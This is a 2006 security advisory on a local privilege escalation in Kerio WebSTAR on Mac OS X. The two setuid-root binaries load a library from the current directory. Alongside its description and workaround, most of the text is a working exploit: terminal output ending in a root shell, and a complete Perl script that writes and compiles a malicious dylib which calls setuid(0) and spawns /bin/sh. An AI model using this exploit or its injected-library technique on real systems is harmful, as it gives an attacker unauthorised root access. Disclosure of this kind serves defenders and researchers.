DMA[2006-1115a] - 'Kerio WebSTAR local privilege escalation' Author: Kevin Finisterre Vendor(s): http://www.kerio.com/webstar_home.html Product: 'Kerio WebSTAR <= 5.4.2 (?)' References: http://www.digitalmunition.com/DMA[2006-1115a].txt Description: Kerio WebSTAR is an easy-to-use web server for Mac OS X. Acquired in January 2006 from 4D, Kerio WebSTAR 5 (formerly known as 4D WebSTAR Server Suite) helps small companies run Internet and intranet websites and integrate them with databases. Upon installing Kerio WebSTAR you will find that you have inherited two setuid binaries in /Applications kevin-finisterres-computer:~/Desktop kf$ find /Applications/Kerio WebSTAR -perm -4000 -ls 978790 3016 -rwsrwx--x 1 root admin 1542556 Apr 10 2006 /Applications/Kerio WebSTAR/AdminServer/WSAdminServer 979475 3288 -rwsrwx--- 1 root admin 1679724 Apr 10 2006 /Applications/Kerio WebSTAR/WebServer/WSWebServer If an attacker is able to gain access to either the webstar user or the admin group, he or she may be able to execute code as root by abusing the binaries mentioned above. For some odd reason both binaries try to load a helper library from within the current directory. In most cases this is obviously not a good idea because an attacker can simply provide the application with the trojaned library of his choice. kevin-finisterres-computer:~ kf$ /Applications/Kerio WebSTAR/WebServer/WSWebServer dyld: Library not loaded: libucache.dylib Referenced from: /Applications/Kerio WebSTAR/WebServer/WSWebServer Reason: image not found Trace/BPT trap kevin-finisterres-computer:~ kf$ /Applications/Kerio WebSTAR/AdminServer/WSAdminServer dyld: Library not loaded: libucache.dylib Referenced from: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer Reason: image not found Trace/BPT trap ktrace gives a better look at what is going on... 1183 WSAdminServer CALL open(0x17e8,0,0) 1183 WSAdminServer NAMI "libucache.dylib" 1183 WSAdminServer RET open -1 errno 2 No such file or directory 1183 WSAdminServer CALL close(0xffffffff) ... 1183 WSAdminServer CALL open(0xbfffea90,0,0) 1183 WSAdminServer NAMI "/var/root/lib/libucache.dylib" 1183 WSAdminServer RET open -1 errno 2 No such file or directory 1183 WSAdminServer CALL close(0xffffffff) 1183 WSAdminServer RET close -1 errno 9 Bad file descriptor 1183 WSAdminServer CALL open(0xbfffea90,0,0) 1183 WSAdminServer NAMI "/usr/local/lib/libucache.dylib" 1183 WSAdminServer RET open -1 errno 2 No such file or directory 1183 WSAdminServer CALL close(0xffffffff) 1183 WSAdminServer RET close -1 errno 9 Bad file descriptor 1183 WSAdminServer CALL open(0xbfffeaa0,0,0) 1183 WSAdminServer NAMI "/usr/lib/libucache.dylib" 1183 WSAdminServer RET open -1 errno 2 No such file or directory 1183 WSAdminServer CALL close(0xffffffff) Exploitation is pretty cut and dry, change directories to a folder that you can write to, compile your helper library, and take root. kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl Usage: ./kerio_WebSTAR_pwn.pl <target> Targets: 0 . kerio-webstar-5.4.2-mac.bin - WSAdminServer 1 . kerio-webstar-5.4.2-mac.bin - WSWebServer kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl 0 *** Target: kerio-webstar-5.4.2-mac.bin - WSAdminServer, Binary: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer /tmp/kerio_pwn.c: In function 'kerio_pwned': /tmp/kerio_pwn.c:2: warning: incompatible implicit declaration of built-in function 'exit' sh-2.05b# id uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 9(procmod), 80(admin) As mentioned previously you must be in the admin group or be the webstar user in order to exploit this issue. If permissions have been changed other users may be able to elevate their status to root as well. kevin-finisterres-computer:~ notadmin$ id uid=505(notadmin) gid=505(notadmin) groups=505(notadmin) kevin-finisterres-computer:~ notadmin$ /Applications/Kerio WebSTAR/WebServer/WSWebServer -bash: /Applications/Kerio WebSTAR/WebServer/WSWebServer: Permission denied kevin-finisterres-computer:~ notadmin$ /Applications/Kerio WebSTAR/AdminServer/WSAdminServer -bash: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer: Permission denied Workaround: Kerio has been contacted, fixes will be available soon. In the mean time limit access to the admin group and the webstar user. Please chmod -s /Applications/Kerio WebSTAR/AdminServer/WSAdminServer and /Applications/Kerio WebSTAR/WebServer/WSWebServer #!/usr/bin/perl # # http://www.digitalmunition.com # written by kf (kf_lists[at]digitalmunition[dot]com) # # you must have access to the webstar user or be in the admin group # # This is currently not patched... chmod -s your kerio binaries foreach $key (keys %ENV) { delete $ENV{$key}; } $tgts{"0"} = "kerio-webstar-5.4.2-mac.bin - WSAdminServer:/Applications/Kerio WebSTAR/AdminServer/WSAdminServer"; $tgts{"1"} = "kerio-webstar-5.4.2-mac.bin - WSWebServer:/Applications/Kerio WebSTAR/WebServer/WSWebServer"; unless (($target) = @ARGV) { print "nnUsage: $0 <target> nnTargets:nn"; foreach $key (sort(keys %tgts)) { ($a,$b) = split(/:/,$tgts{"$key"}); print "t$key . $an"; } print "n"; exit 1; } $ret = pack("l", ($retval)); ($a,$b) = split(/:/,$tgts{"$target"}); print "*** Target: $a, Binary: $bn"; open(KP,">/tmp/kerio_pwn.c"); printf KP "extern char * argv; __attribute__((constructor)) static void kerio_pwned()n"; printf KP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system("/bin/sh -i"); exit(0); }n"; system("gcc -dynamiclib -o /tmp/libucache.dylib /tmp/kerio_pwn.c -current_version 5.0.1 -compatibility_version 5.0.1 -install_name libucache.5.dylib -arch ppc"); system("cd /tmp; "$b"");